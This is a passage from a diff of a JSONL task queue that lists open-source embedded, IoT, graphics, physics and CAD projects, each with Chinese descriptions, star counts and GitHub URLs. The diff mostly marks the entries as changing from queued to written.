运行时一体","col4":"7k"},"url":"https://github.com/PaddlePaddle/Paddle-Lite","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"klipper","area":"projects","topic":"embedded","title":"Klipper","meta":{"col3":"Python + C 双进程 3D 打印固件,运动学算到主机减压主控,开源圈最先进","col4":"10k"},"url":"https://github.com/Klipper3d/klipper","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"marlin","area":"projects","topic":"embedded","title":"Marlin Firmware","meta":{"col3":"8-bit / 32-bit MCU 上跑的开源 3D 打印固件,G-code 解析教科书","col4":"16k"},"url":"https://github.com/MarlinFirmware/Marlin","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"grbl","area":"projects","topic":"embedded","title":"grbl","meta":{"col3":"Arduino UNO 上跑的 G-code 解释器,~30 年的 CNC 控制鼻祖,500 行运动规划核心","col4":"6.4k"},"url":"https://github.com/gnea/grbl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"linuxcnc","area":"projects","topic":"embedded","title":"LinuxCNC","meta":{"col3":"RTLinux 实时内核上的 CNC 机床控制系统,HAL + 实时步进 + GUI 一体","col4":"2k"},"url":"https://github.com/LinuxCNC/linuxcnc","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"ros2","area":"projects","topic":"embedded","title":"ROS 2","meta":{"col3":"机器人操作系统 v2,DDS 消息总线 + lifecycle + composability,工业级实时设计","col4":"4k"},"url":"https://github.com/ros2/ros2","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"moveit2","area":"projects","topic":"embedded","title":"MoveIt 2","meta":{"col3":"ROS 2 上的机械臂运动规划框架,IK / 轨迹 / 碰撞检测 / RViz 一体","col4":"1.2k"},"url":"https://github.com/moveit/moveit2","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"navigation2","area":"projects","topic":"embedded","title":"Nav2","meta":{"col3":"ROS 2 上的移动机器人导航栈,behavior tree + planner + controller 解耦","col4":"3.6k"},"url":"https://github.com/ros-navigation/navigation2","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"gazebo-classic","area":"projects","topic":"embedded","title":"Gazebo Classic","meta":{"col3":"OSRF 的物理仿真器,URDF / SDF / 物理引擎插件,机器人仿真训练事实标准","col4":"1.4k"},"url":"https://github.com/osrf/gazebo","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"home-assistant","area":"projects","topic":"embedded","title":"Home Assistant Core","meta":{"col3":"Python 的开源家庭自动化平台,2000+ integration,端侧 SQLite + WebSocket 架构","col4":"79k"},"url":"https://github.com/home-assistant/core","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"openhab","area":"projects","topic":"embedded","title":"openHAB","meta":{"col3":"Java OSGi 家庭自动化框架,bundle / binding 双层架构,欧洲社区强","col4":"3.3k"},"url":"https://github.com/openhab/openhab-core","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"esphome","area":"projects","topic":"embedded","title":"ESPHome","meta":{"col3":"YAML 配置生成 ESP32 / ESP8266 固件的工具链,与 Home Assistant 深度集成","col4":"9.5k"},"url":"https://github.com/esphome/esphome","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"espurna","area":"projects","topic":"embedded","title":"ESPurna","meta":{"col3":"可商用的 ESP8266 / ESP32 通用智能开关固件(C++),MQTT / HTTP / 调试一体","col4":"3k"},"url":"https://github.com/xoseperez/espurna","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"openthread","area":"projects","topic":"embedded","title":"OpenThread","meta":{"col3":"Google 开源的 Thread 1.3 协议实现,IPv6 over 802.15.4 mesh 事实标准","col4":"3.7k"},"url":"https://github.com/openthread/openthread","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:19:30.222Z"} +{"slug":"sdk-nrf","area":"projects","topic":"embedded","title":"Nordic Connect SDK","meta":{"col3":"Nordic nRF52/nRF53/nRF54 全家桶 SDK,BLE / Thread / Matter / 蜂窝 IoT 一体","col4":"1.7k"},"url":"https://github.com/nrfconnect/sdk-nrf","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:19:32.320Z"} +{"slug":"lora-mac-node","area":"projects","topic":"embedded","title":"LoRaMac-node","meta":{"col3":"LoRa Alliance 参考实现,LoRaWAN MAC 层 + 区域参数 + Class A/B/C 完整","col4":"1.9k"},"url":"https://github.com/Lora-net/LoRaMac-node","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:23:59.400Z"} +{"slug":"mosquitto","area":"projects","topic":"embedded","title":"Eclipse Mosquitto","meta":{"col3":"C 写的 MQTT broker 事实标准,~30k 行,IoT 入门 broker 首选","col4":"9.5k"},"url":"https://github.com/eclipse-mosquitto/mosquitto","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"nanomq","area":"projects","topic":"embedded","title":"NanoMQ","meta":{"col3":"C 写的边缘超轻量 MQTT broker,单线程 / 100KB 二进制,运行在网关 / 容器侧","col4":"1.9k"},"url":"https://github.com/nanomq/nanomq","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"tflite-micro","area":"projects","topic":"embedded","title":"TensorFlow Lite Micro","meta":{"col3":"Google 的微控制器 TF Lite runtime,~16KB ROM 跑 INT8 推理,无 OS / 无 malloc","col4":"2.5k"},"url":"https://github.com/tensorflow/tflite-micro","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:35:44.700Z"} +{"slug":"esp-dl","area":"projects","topic":"embedded","title":"ESP-DL","meta":{"col3":"Espressif 的 ESP32 神经网络推理库,针对 ESP32-S3 向量指令优化","col4":"1.1k"},"url":"https://github.com/espressif/esp-dl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:38:46.321Z"} +{"slug":"cmsis-nn","area":"projects","topic":"embedded","title":"CMSIS-NN","meta":{"col3":"Arm 的 Cortex-M 神经网络算子库,SIMD/Helium 加速,TFLM 默认后端","col4":"1k"},"url":"https://github.com/ARM-software/CMSIS-NN","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:41:02.271Z"} +{"slug":"ncnn","area":"projects","topic":"embedded","title":"ncnn","meta":{"col3":"腾讯开源的端侧 CPU 推理框架,无第三方依赖,ARM NEON / Vulkan 双后端","col4":"21k"},"url":"https://github.com/Tencent/ncnn","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T03:46:04.729Z"} +{"slug":"paddle-lite","area":"projects","topic":"embedded","title":"Paddle Lite","meta":{"col3":"百度的端侧轻量推理引擎,支持 ARM CPU / GPU / NPU / FPGA,模型转换 + 运行时一体","col4":"7k"},"url":"https://github.com/PaddlePaddle/Paddle-Lite","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"klipper","area":"projects","topic":"embedded","title":"Klipper","meta":{"col3":"Python + C 双进程 3D 打印固件,运动学算到主机减压主控,开源圈最先进","col4":"10k"},"url":"https://github.com/Klipper3d/klipper","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"marlin","area":"projects","topic":"embedded","title":"Marlin Firmware","meta":{"col3":"8-bit / 32-bit MCU 上跑的开源 3D 打印固件,G-code 解析教科书","col4":"16k"},"url":"https://github.com/MarlinFirmware/Marlin","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:01:26.277Z"} +{"slug":"grbl","area":"projects","topic":"embedded","title":"grbl","meta":{"col3":"Arduino UNO 上跑的 G-code 解释器,~30 年的 CNC 控制鼻祖,500 行运动规划核心","col4":"6.4k"},"url":"https://github.com/gnea/grbl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:06:28.446Z"} +{"slug":"linuxcnc","area":"projects","topic":"embedded","title":"LinuxCNC","meta":{"col3":"RTLinux 实时内核上的 CNC 机床控制系统,HAL + 实时步进 + GUI 一体","col4":"2k"},"url":"https://github.com/LinuxCNC/linuxcnc","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:11:30.613Z"} +{"slug":"ros2","area":"projects","topic":"embedded","title":"ROS 2","meta":{"col3":"机器人操作系统 v2,DDS 消息总线 + lifecycle + composability,工业级实时设计","col4":"4k"},"url":"https://github.com/ros2/ros2","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"moveit2","area":"projects","topic":"embedded","title":"MoveIt 2","meta":{"col3":"ROS 2 上的机械臂运动规划框架,IK / 轨迹 / 碰撞检测 / RViz 一体","col4":"1.2k"},"url":"https://github.com/moveit/moveit2","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:20:08.777Z"} +{"slug":"navigation2","area":"projects","topic":"embedded","title":"Nav2","meta":{"col3":"ROS 2 上的移动机器人导航栈,behavior tree + planner + controller 解耦","col4":"3.6k"},"url":"https://github.com/ros-navigation/navigation2","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:23:29.390Z"} +{"slug":"gazebo-classic","area":"projects","topic":"embedded","title":"Gazebo Classic","meta":{"col3":"OSRF 的物理仿真器,URDF / SDF / 物理引擎插件,机器人仿真训练事实标准","col4":"1.4k"},"url":"https://github.com/osrf/gazebo","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"home-assistant","area":"projects","topic":"embedded","title":"Home Assistant Core","meta":{"col3":"Python 的开源家庭自动化平台,2000+ integration,端侧 SQLite + WebSocket 架构","col4":"79k"},"url":"https://github.com/home-assistant/core","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:28:33.768Z"} +{"slug":"openhab","area":"projects","topic":"embedded","title":"openHAB","meta":{"col3":"Java OSGi 家庭自动化框架,bundle / binding 双层架构,欧洲社区强","col4":"3.3k"},"url":"https://github.com/openhab/openhab-core","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:33:36.080Z"} +{"slug":"esphome","area":"projects","topic":"embedded","title":"ESPHome","meta":{"col3":"YAML 配置生成 ESP32 / ESP8266 固件的工具链,与 Home Assistant 深度集成","col4":"9.5k"},"url":"https://github.com/esphome/esphome","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:37:39.588Z"} +{"slug":"espurna","area":"projects","topic":"embedded","title":"ESPurna","meta":{"col3":"可商用的 ESP8266 / ESP32 通用智能开关固件(C++),MQTT / HTTP / 调试一体","col4":"3k"},"url":"https://github.com/xoseperez/espurna","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:41:59.570Z"} {"slug":"gstreamer","area":"projects","topic":"embedded","title":"GStreamer","meta":{"col3":"C 写的多媒体 pipeline 框架,element 模型 + 异步 dataflow,嵌入式 / 桌面通用","col4":"2.5k"},"url":"https://github.com/GStreamer/gstreamer","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"ffmpeg-kit","area":"projects","topic":"embedded","title":"FFmpegKit","meta":{"col3":"iOS / Android / tvOS 移动端 FFmpeg 封装,二进制 + 高层 Java/Swift API 一体","col4":"5.1k"},"url":"https://github.com/arthenica/ffmpeg-kit","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"ffmpeg-kit","area":"projects","topic":"embedded","title":"FFmpegKit","meta":{"col3":"iOS / Android / tvOS 移动端 FFmpeg 封装,二进制 + 高层 Java/Swift API 一体","col4":"5.1k"},"url":"https://github.com/arthenica/ffmpeg-kit","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:43:14.786Z"} {"slug":"janus-gateway","area":"projects","topic":"embedded","title":"Janus WebRTC Gateway","meta":{"col3":"C 写的 WebRTC 服务器,plugin 架构,SFU / 录制 / 流转推一体,边缘部署轻量","col4":"8.4k"},"url":"https://github.com/meetecho/janus-gateway","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"unqlite","area":"projects","topic":"embedded","title":"UnQLite","meta":{"col3":"C 写的 NoSQL embedded DB,单文件 KV + JSON 文档双模,~50KB 代码量","col4":"2k"},"url":"https://github.com/symisc/unqlite","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"littlefs","area":"projects","topic":"embedded","title":"littlefs","meta":{"col3":"ARM 维护的 MCU 友好故障可恢复文件系统,掉电安全 + 损耗均衡 + 极小 RAM","col4":"5.5k"},"url":"https://github.com/littlefs-project/littlefs","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"wireguard-go","area":"projects","topic":"embedded","title":"WireGuard-Go","meta":{"col3":"WireGuard VPN 的 Go 用户态实现,参考 ~3000 行密码学实现学习 VPN 内核","col4":"3.7k"},"url":"https://github.com/WireGuard/wireguard-go","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"shadowsocks-libev","area":"projects","topic":"embedded","title":"shadowsocks-libev","meta":{"col3":"C 写的 SOCKS5 加密代理服务端 / 客户端,OpenWrt / 嵌入式路由器主流方案","col4":"16k"},"url":"https://github.com/shadowsocks/shadowsocks-libev","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"mender","area":"projects","topic":"embedded","title":"Mender","meta":{"col3":"Go 写的 IoT OTA 客户端 + 服务端,A/B 双分区原子升级,工业级 fleet 管理","col4":"1.8k"},"url":"https://github.com/mendersoftware/mender","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} -{"slug":"rauc","area":"projects","topic":"embedded","title":"RAUC","meta":{"col3":"C 写的嵌入式 Linux A/B 更新框架,bundle 签名 + dbus 控制,Yocto / Buildroot 集成","col4":"1k"},"url":"https://github.com/rauc/rauc","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"unqlite","area":"projects","topic":"embedded","title":"UnQLite","meta":{"col3":"C 写的 NoSQL embedded DB,单文件 KV + JSON 文档双模,~50KB 代码量","col4":"2k"},"url":"https://github.com/symisc/unqlite","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"littlefs","area":"projects","topic":"embedded","title":"littlefs","meta":{"col3":"ARM 维护的 MCU 友好故障可恢复文件系统,掉电安全 + 损耗均衡 + 极小 RAM","col4":"5.5k"},"url":"https://github.com/littlefs-project/littlefs","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:48:20.027Z"} +{"slug":"wireguard-go","area":"projects","topic":"embedded","title":"WireGuard-Go","meta":{"col3":"WireGuard VPN 的 Go 用户态实现,参考 ~3000 行密码学实现学习 VPN 内核","col4":"3.7k"},"url":"https://github.com/WireGuard/wireguard-go","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:54:11.704Z"} +{"slug":"shadowsocks-libev","area":"projects","topic":"embedded","title":"shadowsocks-libev","meta":{"col3":"C 写的 SOCKS5 加密代理服务端 / 客户端,OpenWrt / 嵌入式路由器主流方案","col4":"16k"},"url":"https://github.com/shadowsocks/shadowsocks-libev","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md"} +{"slug":"mender","area":"projects","topic":"embedded","title":"Mender","meta":{"col3":"Go 写的 IoT OTA 客户端 + 服务端,A/B 双分区原子升级,工业级 fleet 管理","col4":"1.8k"},"url":"https://github.com/mendersoftware/mender","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T04:58:40.339Z"} +{"slug":"rauc","area":"projects","topic":"embedded","title":"RAUC","meta":{"col3":"C 写的嵌入式 Linux A/B 更新框架,bundle 签名 + dbus 控制,Yocto / Buildroot 集成","col4":"1k"},"url":"https://github.com/rauc/rauc","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-embedded.md","written_at":"2026-06-13T05:02:13.043Z"} {"slug":"cocos2d-x","area":"projects","topic":"graphics","title":"Cocos2d-x — C++ 跨平台 2D/3D 引擎","meta":{"col3":"~17k","col4":"中国手游半壁江山起点,MIT 协议 + Lua/JS 绑定,理解 SceneGraph 范本"},"url":"https://github.com/cocos2d/cocos2d-x","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} {"slug":"panda3d","area":"projects","topic":"graphics","title":"Panda3D — Disney/CMU 出品 3D 引擎","meta":{"col3":"~5k","col4":"Python 优先 + C++ 内核,Disney 早期 MMO 战役坐骑,研究教育常用"},"url":"https://github.com/panda3d/panda3d","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} {"slug":"bevy","area":"projects","topic":"graphics","title":"Bevy — Rust 数据驱动 ECS 游戏引擎","meta":{"col3":"~42k","col4":"纯 Rust + ECS + render graph,现代游戏引擎架构教科书"},"url":"https://github.com/bevyengine/bevy","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} @@ -1320,47 +1320,48 @@ {"slug":"playcanvas","area":"projects","topic":"graphics","title":"PlayCanvas — Web 3D 引擎 + 编辑器","meta":{"col3":"~10k","col4":"引擎 OSS + 在线编辑器商业,运行时极小,移动 web 游戏首选"},"url":"https://github.com/playcanvas/engine","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} {"slug":"filament","area":"projects","topic":"graphics","title":"Filament — Google 跨平台 PBR 引擎","meta":{"col3":"~17k","col4":"C++ + Vulkan/Metal/WebGL,IBL 流水线参考实现,渲染论文落地教材"},"url":"https://github.com/google/filament","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} {"slug":"ogre","area":"projects","topic":"graphics","title":"OGRE — 老牌 C++ 3D 渲染引擎","meta":{"col3":"~3.6k","col4":"二十年场景图渲染抽象,Torchlight / Knights 早期商业项目用过"},"url":"https://github.com/OGRECave/ogre","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"regl","area":"projects","topic":"graphics","title":"regl — 函数式 WebGL 封装","meta":{"col3":"~6.1k","col4":"Mikola Lysenko 出品,\"调用即绘制\"无副作用,Observable 数据可视化常用"},"url":"https://github.com/regl-project/regl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"twgl","area":"projects","topic":"graphics","title":"twgl.js — 极薄 WebGL helpers","meta":{"col3":"~2k","col4":"greggman(WebGL Fundamentals 作者)出品,去样板代码不抽象掉 API"},"url":"https://github.com/greggman/twgl.js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"picogl","area":"projects","topic":"graphics","title":"PicoGL.js — 极简 WebGL2 包装","meta":{"col3":"~1.6k","col4":"\"把 WebGL2 写成像 OpenGL\"的一千行实现,理解 GL 调用单元最佳"},"url":"https://github.com/tsherif/picogl.js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"luma-gl","area":"projects","topic":"graphics","title":"luma.gl — vis.gl WebGL2/WebGPU 抽象","meta":{"col3":"~3k","col4":"Uber vis.gl 团队出品,deck.gl 基座,跨 WebGL2/WebGPU 统一层"},"url":"https://github.com/visgl/luma.gl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"deck-gl","area":"projects","topic":"graphics","title":"deck.gl — Uber 大规模数据可视化","meta":{"col3":"~12k","col4":"千万级点 + 地理坐标 + 分层 API,把 GIS 渲染做成声明式"},"url":"https://github.com/visgl/deck.gl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"bullet","area":"projects","topic":"graphics","title":"Bullet — C++ 经典 3D 物理引擎","meta":{"col3":"~13k","col4":"Erwin Coumans 出品,刚体 / 软体 / 布料一应俱全,影视游戏通吃"},"url":"https://github.com/bulletphysics/bullet3","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"box2d","area":"projects","topic":"graphics","title":"Box2D — Erin Catto C++ 2D 物理","meta":{"col3":"~7.7k","col4":"2D 物理算法之父,Angry Birds 同款,所有 JS 端口都从它派生"},"url":"https://github.com/erincatto/box2d","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"matter-js","area":"projects","topic":"graphics","title":"matter.js — JS 2D 刚体物理","meta":{"col3":"~17k","col4":"Web 端最易上手物理引擎,rigid body + constraint + 直接渲染"},"url":"https://github.com/liabru/matter-js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"cannon-es","area":"projects","topic":"graphics","title":"cannon-es — pmndrs 维护的 cannon.js 续","meta":{"col3":"~2.4k","col4":"three.js 生态默认 3D 物理,原 cannon.js 停滞后社区接手"},"url":"https://github.com/pmndrs/cannon-es","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"planck","area":"projects","topic":"graphics","title":"planck.js — Box2D 纯 JS 移植","meta":{"col3":"~4.6k","col4":"不依赖 Emscripten 的纯 JS Box2D,便于阅读源码学物理算法"},"url":"https://github.com/piqnt/planck.js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"rapier","area":"projects","topic":"graphics","title":"Rapier — Rust 现代物理引擎","meta":{"col3":"~4.5k","col4":"2D/3D 同源 + 确定性 + WASM 优秀,bevy/three.js 都能用"},"url":"https://github.com/dimforge/rapier","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"glslify","area":"projects","topic":"graphics","title":"glslify — Browserify 风格 GLSL 模块","meta":{"col3":"~2.4k","col4":"把 require() 引入 shader 世界,npm 上百个着色器函数可即插即用"},"url":"https://github.com/glslify/glslify","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"glsl-canvas","area":"projects","topic":"graphics","title":"glslCanvas — Book of Shaders 配套库","meta":{"col3":"~1.5k","col4":"Patricio Gonzalez Vivo 出品,把 Shadertoy 写法直接嵌进网页"},"url":"https://github.com/patriciogonzalezvivo/glslCanvas","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"shader-park","area":"projects","topic":"graphics","title":"Shader Park — 程序化 SDF 着色器 DSL","meta":{"col3":"~700","col4":"JS DSL 描述 SDF 场景,自动编译 GLSL,让算法艺术更易写"},"url":"https://github.com/shader-park/shader-park-core","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"hydra-synth","area":"projects","topic":"graphics","title":"Hydra — 实时视觉合成 livecoding","meta":{"col3":"~2.7k","col4":"Olivia Jack 出品,浏览器里写 chain API 即生成动态视觉,VJ 圈宠"},"url":"https://github.com/ojack/hydra","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"spectorjs","area":"projects","topic":"graphics","title":"Spector.js — WebGL/WebGPU 调试器","meta":{"col3":"~2.7k","col4":"BabylonJS 团队出品,一键抓取每帧 GL 调用并可视化,调试必备"},"url":"https://github.com/BabylonJS/Spector.js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"assimp","area":"projects","topic":"graphics","title":"Assimp — Open Asset Import Library","meta":{"col3":"~11k","col4":"50+ 种 3D 格式统一为 aiScene,FBX/OBJ/glTF 通吃,引擎导入标配"},"url":"https://github.com/assimp/assimp","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"draco","area":"projects","topic":"graphics","title":"Draco — Google 3D 网格压缩","meta":{"col3":"~7k","col4":"顶点 / UV / 法线压缩到 5-10x,Google Maps / glTF 默认压缩方案"},"url":"https://github.com/google/draco","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"gltf-transform","area":"projects","topic":"graphics","title":"glTF Transform — glTF 资产工具链","meta":{"col3":"~1.6k","col4":"Don McCurdy 出品,命令行 + JS API 优化 / 转换 / 检查 glTF"},"url":"https://github.com/donmccurdy/glTF-Transform","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"open3d","area":"projects","topic":"graphics","title":"Open3D — 现代点云 / 几何库","meta":{"col3":"~12k","col4":"C++ 内核 + Python 接口,深度学习友好,激光雷达 / SLAM 工程默认"},"url":"https://github.com/isl-org/Open3D","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"pcl","area":"projects","topic":"graphics","title":"PCL — Point Cloud Library","meta":{"col3":"~10k","col4":"学术界点云算法集大成,KdTree / VoxelGrid / RANSAC 全家桶"},"url":"https://github.com/PointCloudLibrary/pcl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"spine-runtimes","area":"projects","topic":"graphics","title":"Spine Runtimes — 2D 骨骼动画运行时","meta":{"col3":"~3.7k","col4":"Esoteric Software 出品,配套商业编辑器但运行时 OSS,10+ 引擎适配"},"url":"https://github.com/EsotericSoftware/spine-runtimes","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"dragonbones","area":"projects","topic":"graphics","title":"DragonBones — 国产开源骨骼动画","meta":{"col3":"~1k","col4":"Egret 出品,Spine 国产对位 + 网格变形 + 多语言运行时"},"url":"https://github.com/DragonBones/DragonBonesCPP","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"rive","area":"projects","topic":"graphics","title":"Rive — 交互动画运行时","meta":{"col3":"~7k","col4":"状态机 + 矢量动画 + 跨平台 runtime,把动画做成可交互组件"},"url":"https://github.com/rive-app/rive-runtime","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"aframe","area":"projects","topic":"graphics","title":"A-Frame — Web VR 框架","meta":{"col3":"~17k","col4":"Mozilla 系出品,HTML 标签写 VR 场景,three.js 上面的声明式层"},"url":"https://github.com/aframevr/aframe","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"mind-ar-js","area":"projects","topic":"graphics","title":"MindAR — Web 图像/人脸 AR","meta":{"col3":"~2.6k","col4":"纯 JS 实现的图像追踪 + 人脸 AR,无需 ARKit/ARCore"},"url":"https://github.com/hiukim/mind-ar-js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"ar-js","area":"projects","topic":"graphics","title":"AR.js — Web AR 标记追踪","meta":{"col3":"~5.5k","col4":"浏览器里跑 marker / location AR,移动端 60fps + 不用 App"},"url":"https://github.com/AR-js-org/AR.js","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"openxr-sdk","area":"projects","topic":"graphics","title":"OpenXR SDK — Khronos VR/AR 标准","meta":{"col3":"~1k","col4":"多家头显厂商共同后端,VR/AR 跨设备 API 标准,参考实现仓库"},"url":"https://github.com/KhronosGroup/OpenXR-SDK-Source","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"openscad","area":"projects","topic":"graphics","title":"OpenSCAD — 脚本式 CAD","meta":{"col3":"~8k","col4":"\"代码即模型\"的程序员 CAD,3D 打印社区默认工具"},"url":"https://github.com/openscad/openscad","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"freecad","area":"projects","topic":"graphics","title":"FreeCAD — 参数化 CAD","meta":{"col3":"~22k","col4":"全功能参数化 CAD,PartDesign / 装配 / 工程图,对标 SolidWorks"},"url":"https://github.com/FreeCAD/FreeCAD","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"librecad","area":"projects","topic":"graphics","title":"LibreCAD — 2D 工程绘图","meta":{"col3":"~2.2k","col4":"Qt 写的 AutoCAD-like 2D,DXF 原生,制图教学起点"},"url":"https://github.com/LibreCAD/LibreCAD","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"kicad","area":"projects","topic":"graphics","title":"KiCad — 电子电路 CAD","meta":{"col3":"~2.5k","col4":"原理图 + PCB + 3D 预览,CERN 加持的开源 EDA 旗舰"},"url":"https://github.com/KiCad/kicad-source-mirror","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"appleseed","area":"projects","topic":"graphics","title":"appleseed — 物理渲染器","meta":{"col3":"~2.3k","col4":"现代离线渲染器,BVH / OSL / 光谱采样齐全,Maya/Blender 插件接入"},"url":"https://github.com/appleseedhq/appleseed","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"luxcorerender","area":"projects","topic":"graphics","title":"LuxCoreRender — 物理光线追踪","meta":{"col3":"~1.1k","col4":"LuxRender 续作,PathTracing + BiPathTracing + GPU,研究友好"},"url":"https://github.com/LuxCoreRender/LuxCore","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"mitsuba3","area":"projects","topic":"graphics","title":"Mitsuba 3 — 研究向可微渲染器","meta":{"col3":"~2.2k","col4":"EPFL 出品,可微渲染 + JIT 编译,神经辐射场 / 